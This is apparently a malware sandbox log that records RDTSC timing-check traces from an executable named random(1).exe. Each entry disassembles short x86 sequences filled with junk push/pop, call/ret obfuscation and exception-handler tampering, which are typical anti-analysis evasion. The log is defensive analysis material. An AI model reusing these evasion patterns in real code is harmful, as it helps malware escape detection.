Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1085259 second address: 10852B0 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F06D8B4D9C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], ebx 0x0000000f push 00000000h 0x00000011 push eax 0x00000012 call 00007F06D8B4D9C8h 0x00000017 pop eax 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c add dword ptr [esp+04h], 00000015h 0x00000024 inc eax 0x00000025 push eax 0x00000026 ret 0x00000027 pop eax 0x00000028 ret 0x00000029 call 00007F06D8B4D9CBh 0x0000002e push eax 0x0000002f sub di, 1E4Ah 0x00000034 pop esi 0x00000035 pop esi 0x00000036 nop 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a jmp 00007F06D8B4D9D1h 0x0000003f push eax 0x00000040 pop eax 0x00000041 popad 0x00000042 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10852B0 second address: 10852DC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D851854Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F06D8518555h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10852DC second address: 10852E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1085511 second address: 1085515 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1085515 second address: 108551B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10856AF second address: 10856B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10856B5 second address: 10856BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1085803 second address: 108580D instructions: 0x00000000 rdtsc 0x00000002 jno 00007F06D8518546h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1086DAE second address: 1086DB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1087E35 second address: 1087EBD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D8518553h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push esi 0x0000000d call 00007F06D8518548h 0x00000012 pop esi 0x00000013 mov dword ptr [esp+04h], esi 0x00000017 add dword ptr [esp+04h], 00000017h 0x0000001f inc esi 0x00000020 push esi 0x00000021 ret 0x00000022 pop esi 0x00000023 ret 0x00000024 jmp 00007F06D851854Dh 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push ebx 0x0000002e call 00007F06D8518548h 0x00000033 pop ebx 0x00000034 mov dword ptr [esp+04h], ebx 0x00000038 add dword ptr [esp+04h], 00000018h 0x00000040 inc ebx 0x00000041 push ebx 0x00000042 ret 0x00000043 pop ebx 0x00000044 ret 0x00000045 push 00000000h 0x00000047 and edi, 62C285E4h 0x0000004d xchg eax, ebx 0x0000004e jmp 00007F06D851854Fh 0x00000053 push eax 0x00000054 pushad 0x00000055 push eax 0x00000056 push edx 0x00000057 jne 00007F06D8518546h 0x0000005d rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1088E3A second address: 1088EC8 instructions: 0x00000000 rdtsc 0x00000002 je 00007F06D8B4D9C8h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jne 00007F06D8B4D9E3h 0x00000013 nop 0x00000014 push 00000000h 0x00000016 push edx 0x00000017 call 00007F06D8B4D9C8h 0x0000001c pop edx 0x0000001d mov dword ptr [esp+04h], edx 0x00000021 add dword ptr [esp+04h], 0000001Bh 0x00000029 inc edx 0x0000002a push edx 0x0000002b ret 0x0000002c pop edx 0x0000002d ret 0x0000002e adc si, 1BB0h 0x00000033 push 00000000h 0x00000035 cld 0x00000036 push 00000000h 0x00000038 push 00000000h 0x0000003a push edx 0x0000003b call 00007F06D8B4D9C8h 0x00000040 pop edx 0x00000041 mov dword ptr [esp+04h], edx 0x00000045 add dword ptr [esp+04h], 00000019h 0x0000004d inc edx 0x0000004e push edx 0x0000004f ret 0x00000050 pop edx 0x00000051 ret 0x00000052 xchg eax, ebx 0x00000053 jp 00007F06D8B4D9D2h 0x00000059 js 00007F06D8B4D9CCh 0x0000005f push eax 0x00000060 push edx 0x00000061 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1088670 second address: 1088675 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1089860 second address: 10898E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push esi 0x00000006 pop esi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ebx 0x00000010 call 00007F06D8B4D9C8h 0x00000015 pop ebx 0x00000016 mov dword ptr [esp+04h], ebx 0x0000001a add dword ptr [esp+04h], 0000001Dh 0x00000022 inc ebx 0x00000023 push ebx 0x00000024 ret 0x00000025 pop ebx 0x00000026 ret 0x00000027 add dword ptr [ebp+122D1E95h], esi 0x0000002d mov dword ptr [ebp+122D577Ah], eax 0x00000033 push 00000000h 0x00000035 pushad 0x00000036 movzx eax, di 0x00000039 or ecx, dword ptr [ebp+122D2947h] 0x0000003f popad 0x00000040 push 00000000h 0x00000042 push 00000000h 0x00000044 push eax 0x00000045 call 00007F06D8B4D9C8h 0x0000004a pop eax 0x0000004b mov dword ptr [esp+04h], eax 0x0000004f add dword ptr [esp+04h], 0000001Bh 0x00000057 inc eax 0x00000058 push eax 0x00000059 ret 0x0000005a pop eax 0x0000005b ret 0x0000005c push edi 0x0000005d mov dword ptr [ebp+122D3799h], eax 0x00000063 pop edi 0x00000064 xchg eax, ebx 0x00000065 pushad 0x00000066 push eax 0x00000067 push edx 0x00000068 jne 00007F06D8B4D9C6h 0x0000006e rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 108B2D2 second address: 108B2DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 108B2DA second address: 108B2DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 108B879 second address: 108B8FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D8518550h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push edx 0x0000000f call 00007F06D8518548h 0x00000014 pop edx 0x00000015 mov dword ptr [esp+04h], edx 0x00000019 add dword ptr [esp+04h], 00000019h 0x00000021 inc edx 0x00000022 push edx 0x00000023 ret 0x00000024 pop edx 0x00000025 ret 0x00000026 mov dword ptr [ebp+122D3880h], edi 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push ebx 0x00000031 call 00007F06D8518548h 0x00000036 pop ebx 0x00000037 mov dword ptr [esp+04h], ebx 0x0000003b add dword ptr [esp+04h], 0000001Ch 0x00000043 inc ebx 0x00000044 push ebx 0x00000045 ret 0x00000046 pop ebx 0x00000047 ret 0x00000048 or dword ptr [ebp+122D3780h], edx 0x0000004e jo 00007F06D851854Ch 0x00000054 mov dword ptr [ebp+122D1772h], edi 0x0000005a push 00000000h 0x0000005c mov edi, dword ptr [ebp+122D25D5h] 0x00000062 xchg eax, ebx 0x00000063 push esi 0x00000064 pushad 0x00000065 push eax 0x00000066 push edx 0x00000067 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 108B8FC second address: 108B930 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F06D8B4D9D3h 0x00000009 popad 0x0000000a pop esi 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f je 00007F06D8B4D9C6h 0x00000015 jmp 00007F06D8B4D9D0h 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 108CF39 second address: 108CF3F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 108CF3F second address: 108CFAC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007F06D8B4D9C6h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e nop 0x0000000f mov di, dx 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push ebp 0x00000017 call 00007F06D8B4D9C8h 0x0000001c pop ebp 0x0000001d mov dword ptr [esp+04h], ebp 0x00000021 add dword ptr [esp+04h], 0000001Bh 0x00000029 inc ebp 0x0000002a push ebp 0x0000002b ret 0x0000002c pop ebp 0x0000002d ret 0x0000002e pushad 0x0000002f and eax, dword ptr [ebp+122D29F3h] 0x00000035 cmc 0x00000036 popad 0x00000037 push 00000000h 0x00000039 push 00000000h 0x0000003b push edx 0x0000003c call 00007F06D8B4D9C8h 0x00000041 pop edx 0x00000042 mov dword ptr [esp+04h], edx 0x00000046 add dword ptr [esp+04h], 00000016h 0x0000004e inc edx 0x0000004f push edx 0x00000050 ret 0x00000051 pop edx 0x00000052 ret 0x00000053 or esi, 3A5567D4h 0x00000059 push eax 0x0000005a push eax 0x0000005b push edx 0x0000005c push ebx 0x0000005d pushad 0x0000005e popad 0x0000005f pop ebx 0x00000060 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 108CC96 second address: 108CC9B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 108CC9B second address: 108CCA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1091727 second address: 109172B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1091D1C second address: 1091D20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1092D36 second address: 1092D49 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F06D8518548h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1092D49 second address: 1092D4D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1092D4D second address: 1092D53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1092D53 second address: 1092D6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F06D8B4D9D6h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1091F3F second address: 1091F5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F06D8518557h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1099722 second address: 109972C instructions: 0x00000000 rdtsc 0x00000002 jl 00007F06D8B4D9C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 109972C second address: 1099732 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1099732 second address: 1099736 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1092F04 second address: 1092F10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push eax 0x00000008 push edi 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1099736 second address: 1099743 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push ecx 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1096897 second address: 109689D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 109689D second address: 10968DA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F06D8B4D9D9h 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d jmp 00007F06D8B4D9D8h 0x00000012 push eax 0x00000013 push edx 0x00000014 push edi 0x00000015 pop edi 0x00000016 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10968DA second address: 10968DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1093FF2 second address: 1093FF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1093FF8 second address: 1093FFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1093FFC second address: 109400D instructions: 0x00000000 rdtsc 0x00000002 jne 00007F06D8B4D9C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 109B7AC second address: 109B7B6 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F06D851854Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 109B7B6 second address: 109B825 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push ecx 0x0000000c call 00007F06D8B4D9C8h 0x00000011 pop ecx 0x00000012 mov dword ptr [esp+04h], ecx 0x00000016 add dword ptr [esp+04h], 00000015h 0x0000001e inc ecx 0x0000001f push ecx 0x00000020 ret 0x00000021 pop ecx 0x00000022 ret 0x00000023 clc 0x00000024 mov dword ptr [ebp+122D2043h], edi 0x0000002a push 00000000h 0x0000002c push 00000000h 0x0000002e push edi 0x0000002f call 00007F06D8B4D9C8h 0x00000034 pop edi 0x00000035 mov dword ptr [esp+04h], edi 0x00000039 add dword ptr [esp+04h], 00000015h 0x00000041 inc edi 0x00000042 push edi 0x00000043 ret 0x00000044 pop edi 0x00000045 ret 0x00000046 mov dword ptr [ebp+12463B99h], ecx 0x0000004c add bx, BFA7h 0x00000051 mov ebx, dword ptr [ebp+122D215Ah] 0x00000057 push 00000000h 0x00000059 add bx, E144h 0x0000005e xchg eax, esi 0x0000005f push eax 0x00000060 push edx 0x00000061 push eax 0x00000062 push edx 0x00000063 jnp 00007F06D8B4D9C6h 0x00000069 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 109B825 second address: 109B829 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 109B829 second address: 109B82F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1098952 second address: 109895C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F06D8518546h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 109A8B5 second address: 109A8B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 109B997 second address: 109B99D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 109D827 second address: 109D848 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D8B4D9D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b jns 00007F06D8B4D9D4h 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 109D848 second address: 109D84C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 109CA6D second address: 109CA71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 109CB7F second address: 109CB83 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 109EBAD second address: 109EBB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F06D8B4D9C6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10A1818 second address: 10A181C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10A181C second address: 10A1822 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10A0949 second address: 10A09E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 push eax 0x00000007 jmp 00007F06D8518558h 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push edi 0x00000010 call 00007F06D8518548h 0x00000015 pop edi 0x00000016 mov dword ptr [esp+04h], edi 0x0000001a add dword ptr [esp+04h], 00000018h 0x00000022 inc edi 0x00000023 push edi 0x00000024 ret 0x00000025 pop edi 0x00000026 ret 0x00000027 add dword ptr [ebp+122D3672h], edx 0x0000002d push dword ptr fs:[00000000h] 0x00000034 movzx edi, di 0x00000037 mov dword ptr fs:[00000000h], esp 0x0000003e push esi 0x0000003f mov ebx, 2615F3AEh 0x00000044 pop edi 0x00000045 mov eax, dword ptr [ebp+122D05E9h] 0x0000004b mov dword ptr [ebp+122D38A3h], ebx 0x00000051 push FFFFFFFFh 0x00000053 push 00000000h 0x00000055 push ebp 0x00000056 call 00007F06D8518548h 0x0000005b pop ebp 0x0000005c mov dword ptr [esp+04h], ebp 0x00000060 add dword ptr [esp+04h], 00000015h 0x00000068 inc ebp 0x00000069 push ebp 0x0000006a ret 0x0000006b pop ebp 0x0000006c ret 0x0000006d add bh, 00000055h 0x00000070 push eax 0x00000071 push eax 0x00000072 push edx 0x00000073 jno 00007F06D851854Ch 0x00000079 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10A1AD3 second address: 10A1AEB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F06D8B4D9D3h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10A2A4A second address: 10A2A4E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 104BF37 second address: 104BF3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 104BF3B second address: 104BF50 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D851854Bh 0x00000007 jbe 00007F06D8518546h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 104BF50 second address: 104BF56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 104BF56 second address: 104BF60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F06D8518546h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 104BF60 second address: 104BF64 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 104BF64 second address: 104BF86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F06D8518553h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 push eax 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 104BF86 second address: 104BF8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1041BF5 second address: 1041BF9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10AA679 second address: 10AA688 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push edx 0x00000007 pop edx 0x00000008 popad 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10AA688 second address: 10AA69B instructions: 0x00000000 rdtsc 0x00000002 jno 00007F06D8518546h 0x00000008 jp 00007F06D8518546h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10AAB6B second address: 10AAB6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10B2450 second address: 10B2458 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10B2458 second address: 10B2487 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F06D8B4D9C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e jmp 00007F06D8B4D9CDh 0x00000013 pop eax 0x00000014 push edi 0x00000015 jl 00007F06D8B4D9C6h 0x0000001b pop edi 0x0000001c popad 0x0000001d mov eax, dword ptr [esp+04h] 0x00000021 push eax 0x00000022 push edx 0x00000023 push ecx 0x00000024 pushad 0x00000025 popad 0x00000026 pop ecx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10B2487 second address: 10B24A7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D8518555h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10B24A7 second address: 10B24AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10B24AB second address: 10B24D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b popad 0x0000000c popad 0x0000000d mov dword ptr [esp+04h], eax 0x00000011 jng 00007F06D8518561h 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F06D8518553h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10B7785 second address: 10B77A4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F06D8B4D9D9h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10B640E second address: 10B6418 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F06D8518546h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10B6418 second address: 10B6447 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F06D8B4D9C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jg 00007F06D8B4D9E0h 0x00000011 pushad 0x00000012 popad 0x00000013 jmp 00007F06D8B4D9D8h 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10B6447 second address: 10B644B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10B644B second address: 10B644F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
